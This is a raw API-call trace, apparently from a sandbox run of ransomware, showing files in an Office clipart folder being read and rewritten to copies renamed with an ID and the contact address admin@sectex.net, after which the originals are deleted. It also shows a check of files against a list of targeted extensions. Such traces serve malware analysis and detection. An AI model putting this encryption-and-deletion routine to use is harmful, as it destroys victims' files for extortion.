	[0164.332] WriteFile (in: hFile=0x1b4, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x2990, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x2990, lpOverlapped=0x0) returned 1
	[0164.333] ReadFile (in: hFile=0x3a8, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0164.333] WriteFile (in: hFile=0x1b4, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0164.333] SetEndOfFile (hFile=0x1b4) returned 1
	[0164.333] CloseHandle (hObject=0x1b4) returned 1
	[0164.333] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0164.333] SetEndOfFile (hFile=0x3a8) returned 1
	[0164.335] CloseHandle (hObject=0x3a8) returned 1
	[0164.335] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151063.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0164.336] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151063.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0151063.wmf")) returned 1
	[0164.336] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151063.WMF") returned 63
	[0164.336] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151063.WMF") returned 63
	[0164.336] lstrlenW (lpString=".doc") returned 4
	[0164.336] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0164.336] lstrlenW (lpString=".docx") returned 5
	[0164.336] lstrcmpiW (lpString1=".docx", lpString2="3.WMF") returned -1
	[0164.336] lstrlenW (lpString=".pdf") returned 4
	[0164.336] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0164.336] lstrlenW (lpString=".xls") returned 4
	[0164.336] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0164.336] lstrlenW (lpString=".xlsx") returned 5
	[0164.336] lstrcmpiW (lpString1=".xlsx", lpString2="3.WMF") returned -1
	[0164.337] lstrlenW (lpString=".ppt") returned 4
	[0164.337] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0164.337] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151063.WMF") returned 63
	[0164.337] lstrlenW (lpString=".zip") returned 4
	[0164.337] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0164.337] lstrlenW (lpString=".rar") returned 4
	[0164.337] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0164.337] lstrlenW (lpString=".bz2") returned 4
	[0164.337] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0164.337] lstrlenW (lpString=".7z") returned 3
	[0164.337] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0164.337] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151063.WMF") returned 63
	[0164.337] lstrlenW (lpString=".dbf") returned 4
	[0164.337] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0164.337] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151063.WMF") returned 63
	[0164.337] lstrlenW (lpString=".1cd") returned 4
	[0164.337] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0164.337] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151063.WMF") returned 63
	[0164.337] lstrlenW (lpString=".jpg") returned 4
	[0164.337] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0164.337] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151063.WMF") returned 63
	[0164.337] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151063.WMF") returned 63
	[0164.337] lstrlenW (lpString=".doc") returned 4
	[0164.337] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0164.337] lstrlenW (lpString=".docx") returned 5
	[0164.337] lstrcmpiW (lpString1=".docx", lpString2="3.WMF") returned -1
	[0164.338] lstrlenW (lpString=".pdf") returned 4
	[0164.338] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0164.338] lstrlenW (lpString=".xls") returned 4
	[0164.338] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0164.338] lstrlenW (lpString=".xlsx") returned 5
	[0164.338] lstrcmpiW (lpString1=".xlsx", lpString2="3.WMF") returned -1
	[0164.338] lstrlenW (lpString=".ppt") returned 4
	[0164.338] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0164.338] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151063.WMF") returned 63
	[0164.338] lstrlenW (lpString=".zip") returned 4
	[0164.338] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0164.338] lstrlenW (lpString=".rar") returned 4
	[0164.338] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0164.338] lstrlenW (lpString=".bz2") returned 4
	[0164.338] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0164.338] lstrlenW (lpString=".7z") returned 3
	[0164.338] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0164.338] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151063.WMF") returned 63
	[0164.338] lstrlenW (lpString=".dbf") returned 4
	[0164.338] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0164.338] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151063.WMF") returned 63
	[0164.338] lstrlenW (lpString=".1cd") returned 4
	[0164.338] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0164.338] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151063.WMF") returned 63
	[0164.338] lstrlenW (lpString=".jpg") returned 4
	[0164.338] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0164.338] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0164.338] lstrlenW (lpString="J0151067.WMF") returned 12
	[0164.338] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151067.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0151067.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8
	[0164.339] GetFileSizeEx (in: hFile=0x3a8, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=13204) returned 1
	[0164.339] CloseHandle (hObject=0x3a8) returned 1
	[0164.339] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151067.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0151067.wmf")) returned 0x20
	[0164.339] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151067.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0151067.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0164.339] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151067.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0151067.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8
	[0164.340] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0164.340] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0164.340] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151067.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0151067.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4
	[0164.340] GetLastError () returned 0x0
	[0164.340] ReadFile (in: hFile=0x3a8, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x3394, lpOverlapped=0x0) returned 1
	[0164.342] WriteFile (in: hFile=0x1b4, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x33a0, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x33a0, lpOverlapped=0x0) returned 1
	[0164.343] ReadFile (in: hFile=0x3a8, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0164.343] WriteFile (in: hFile=0x1b4, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0164.343] SetEndOfFile (hFile=0x1b4) returned 1
	[0164.343] CloseHandle (hObject=0x1b4) returned 1
	[0164.344] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0164.344] SetEndOfFile (hFile=0x3a8) returned 1
	[0164.346] CloseHandle (hObject=0x3a8) returned 1
	[0164.346] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151067.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0164.347] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151067.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0151067.wmf")) returned 1
	[0164.347] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151067.WMF") returned 63
	[0164.347] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151067.WMF") returned 63
	[0164.347] lstrlenW (lpString=".doc") returned 4
	[0164.347] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0164.347] lstrlenW (lpString=".docx") returned 5
	[0164.347] lstrcmpiW (lpString1=".docx", lpString2="7.WMF") returned -1
	[0164.347] lstrlenW (lpString=".pdf") returned 4
	[0164.347] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0164.347] lstrlenW (lpString=".xls") returned 4
	[0164.347] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0164.348] lstrlenW (lpString=".xlsx") returned 5
	[0164.348] lstrcmpiW (lpString1=".xlsx", lpString2="7.WMF") returned -1
	[0164.348] lstrlenW (lpString=".ppt") returned 4
	[0164.348] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0164.348] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151067.WMF") returned 63
	[0164.348] lstrlenW (lpString=".zip") returned 4
	[0164.348] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0164.348] lstrlenW (lpString=".rar") returned 4
	[0164.348] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0164.348] lstrlenW (lpString=".bz2") returned 4
	[0164.348] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0164.348] lstrlenW (lpString=".7z") returned 3
	[0164.348] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0164.348] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151067.WMF") returned 63
	[0164.348] lstrlenW (lpString=".dbf") returned 4
	[0164.348] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0164.348] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151067.WMF") returned 63
	[0164.348] lstrlenW (lpString=".1cd") returned 4
	[0164.348] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0164.348] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151067.WMF") returned 63
	[0164.348] lstrlenW (lpString=".jpg") returned 4
	[0164.348] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0164.348] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151067.WMF") returned 63
	[0164.348] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151067.WMF") returned 63
	[0164.348] lstrlenW (lpString=".doc") returned 4
	[0164.348] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0164.348] lstrlenW (lpString=".docx") returned 5
	[0164.348] lstrcmpiW (lpString1=".docx", lpString2="7.WMF") returned -1
	[0164.348] lstrlenW (lpString=".pdf") returned 4
	[0164.348] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0164.348] lstrlenW (lpString=".xls") returned 4
	[0164.348] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0164.348] lstrlenW (lpString=".xlsx") returned 5
	[0164.348] lstrcmpiW (lpString1=".xlsx", lpString2="7.WMF") returned -1
	[0164.348] lstrlenW (lpString=".ppt") returned 4
	[0164.349] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0164.349] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151067.WMF") returned 63
	[0164.349] lstrlenW (lpString=".zip") returned 4
	[0164.349] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0164.349] lstrlenW (lpString=".rar") returned 4
	[0164.349] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0164.349] lstrlenW (lpString=".bz2") returned 4
	[0164.349] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0164.349] lstrlenW (lpString=".7z") returned 3
	[0164.349] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0164.349] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151067.WMF") returned 63
	[0164.349] lstrlenW (lpString=".dbf") returned 4
	[0164.349] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0164.349] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151067.WMF") returned 63
	[0164.349] lstrlenW (lpString=".1cd") returned 4
	[0164.349] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0164.349] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151067.WMF") returned 63
	[0164.349] lstrlenW (lpString=".jpg") returned 4
	[0164.349] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0164.349] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0164.349] lstrlenW (lpString="J0151073.WMF") returned 12
	[0164.349] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151073.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0151073.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8
	[0164.350] GetFileSizeEx (in: hFile=0x3a8, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=13336) returned 1
	[0164.350] CloseHandle (hObject=0x3a8) returned 1
	[0164.350] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151073.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0151073.wmf")) returned 0x20
	[0164.350] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151073.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0151073.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0164.350] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151073.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0151073.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8
	[0164.350] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0164.350] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0164.350] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151073.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0151073.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4
	[0164.351] GetLastError () returned 0x0
	[0164.351] ReadFile (in: hFile=0x3a8, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x3418, lpOverlapped=0x0) returned 1
	[0164.592] WriteFile (in: hFile=0x1b4, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x3420, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x3420, lpOverlapped=0x0) returned 1
	[0164.593] ReadFile (in: hFile=0x3a8, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0164.593] WriteFile (in: hFile=0x1b4, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0164.593] SetEndOfFile (hFile=0x1b4) returned 1
	[0164.593] CloseHandle (hObject=0x1b4) returned 1
	[0164.593] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0164.593] SetEndOfFile (hFile=0x3a8) returned 1
	[0164.595] CloseHandle (hObject=0x3a8) returned 1
	[0164.595] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151073.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0164.601] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151073.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0151073.wmf")) returned 1
	[0164.612] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151073.WMF") returned 63
	[0164.612] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151073.WMF") returned 63
	[0164.612] lstrlenW (lpString=".doc") returned 4
	[0164.612] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0164.612] lstrlenW (lpString=".docx") returned 5
	[0164.612] lstrcmpiW (lpString1=".docx", lpString2="3.WMF") returned -1
	[0164.612] lstrlenW (lpString=".pdf") returned 4
	[0164.612] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0164.612] lstrlenW (lpString=".xls") returned 4
	[0164.612] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0164.612] lstrlenW (lpString=".xlsx") returned 5
	[0164.612] lstrcmpiW (lpString1=".xlsx", lpString2="3.WMF") returned -1
	[0164.612] lstrlenW (lpString=".ppt") returned 4
	[0164.612] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0164.612] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151073.WMF") returned 63
	[0164.612] lstrlenW (lpString=".zip") returned 4
	[0164.612] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0164.612] lstrlenW (lpString=".rar") returned 4
	[0164.612] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0164.612] lstrlenW (lpString=".bz2") returned 4
	[0164.612] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0164.612] lstrlenW (lpString=".7z") returned 3
	[0164.612] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0164.612] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151073.WMF") returned 63
	[0164.612] lstrlenW (lpString=".dbf") returned 4
	[0164.612] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0164.612] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151073.WMF") returned 63
	[0164.612] lstrlenW (lpString=".1cd") returned 4
	[0164.612] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0164.612] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151073.WMF") returned 63
	[0164.612] lstrlenW (lpString=".jpg") returned 4
	[0164.612] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0164.612] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151073.WMF") returned 63
	[0164.612] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151073.WMF") returned 63
	[0164.613] lstrlenW (lpString=".doc") returned 4
	[0164.613] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0164.613] lstrlenW (lpString=".docx") returned 5
	[0164.613] lstrcmpiW (lpString1=".docx", lpString2="3.WMF") returned -1
	[0164.613] lstrlenW (lpString=".pdf") returned 4
	[0164.613] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0164.613] lstrlenW (lpString=".xls") returned 4
	[0164.613] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0164.613] lstrlenW (lpString=".xlsx") returned 5
	[0164.613] lstrcmpiW (lpString1=".xlsx", lpString2="3.WMF") returned -1
	[0164.613] lstrlenW (lpString=".ppt") returned 4
	[0164.613] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0164.613] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151073.WMF") returned 63
	[0164.613] lstrlenW (lpString=".zip") returned 4
	[0164.613] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0164.613] lstrlenW (lpString=".rar") returned 4
	[0164.613] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0164.613] lstrlenW (lpString=".bz2") returned 4
	[0164.613] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0164.613] lstrlenW (lpString=".7z") returned 3
	[0164.613] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0164.613] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151073.WMF") returned 63
	[0164.613] lstrlenW (lpString=".dbf") returned 4
	[0164.613] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0164.613] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151073.WMF") returned 63
	[0164.613] lstrlenW (lpString=".1cd") returned 4
	[0164.613] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0164.613] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151073.WMF") returned 63
	[0164.613] lstrlenW (lpString=".jpg") returned 4
	[0164.613] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0164.614] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0164.614] lstrlenW (lpString="J0152556.WMF") returned 12
	[0164.614] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152556.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152556.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8
	[0164.614] GetFileSizeEx (in: hFile=0x3e8, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=16432) returned 1
	[0164.614] CloseHandle (hObject=0x3e8) returned 1
	[0164.614] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152556.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152556.wmf")) returned 0x20
	[0164.614] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152556.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152556.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0164.615] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152556.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152556.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8
	[0164.615] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0164.615] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0164.615] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152556.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152556.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c
	[0164.616] GetLastError () returned 0x0
	[0164.616] ReadFile (in: hFile=0x3e8, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x4030, lpOverlapped=0x0) returned 1
	[0164.638] WriteFile (in: hFile=0x25c, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x4040, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x4040, lpOverlapped=0x0) returned 1
